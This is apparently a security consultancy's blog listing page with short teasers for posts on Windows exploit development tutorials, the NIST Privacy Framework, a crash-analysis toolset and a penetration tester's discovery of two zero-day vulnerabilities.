The Basics of Exploit Development 2: SEH Overflows
March 13, 2020, Andy Bowden, Consultant, Coalfire Labs
In this article we will be writing an exploit for a 32-bit Windows application vulnerable to Structured Exception Handler (SEH) overflows. While this type of exploit has been around for a long time, it is still applicable to modern systems.
The Significance of the NIST Privacy Framework
February 21, 2020, Mali Yared, Practice Director, Cyber Risk Advisory & Privacy, Coalfire
Kudos to the NIST Privacy Team! Privacy Framework v.1.0 has finally been released. I’ve been tracking the growth of this initiative since the focus group was kicked off in September 2018 and respect its thoroughly explored yet fundamentally grass roots approach. A few points worth bringing to your attention:
The Basics of Exploit Development 1: Win32 Buffer Overflows
January 21, 2020, Andy Bowden, Consultant, Coalfire Labs
In this article we will cover the creation of an exploit for a 32-bit Windows application vulnerable to a buffer overflow using X64dbg and the associated ERC plugin. As this is the first article in this series, we will be looking at an exploit where we have a complete EIP overwrite and ESP points directly into our buffer. A basic knowledge of assembly and the Windows operating system will be useful, however, it is not a requirement.
ERC.Net – A Toolset for Analyzing Windows Application Crashes
October 02, 2019, Andy Bowden, Consultant, Coalfire Labs
ERC.Net is a collection of tools designed to assist in analyzing and debugging Windows application crashes in order to identify potential security vulnerabilities. Supporting both 64 and 32 bit applications, ERC.Net has many use cases including parsing Windows file headers, identifying compile-time flags such as ASLR, DEP and SafeSEH, generating nonrepeating patterns and platform-specific egg hunters, detecting process information such as loaded modules and running threads, reading the TEB of a specific thread, and assisting in the identification of numerous types of memory vulnerabilities.
When Checking the Box Results in Two Zero Days and Root (CVE-2019-14257 and CVE-2019-14258)
August 21, 2019, Jakob Nelson, Associate, Coalfire Labs
Finding new bugs and exploiting them can be exciting and fun for a penetration tester. I was ecstatic to find my first two zero-days, and I used them to break a system from no access to root. This was a good day for me – but the story behind the story provides some real lessons enterprises can apply to their security programs.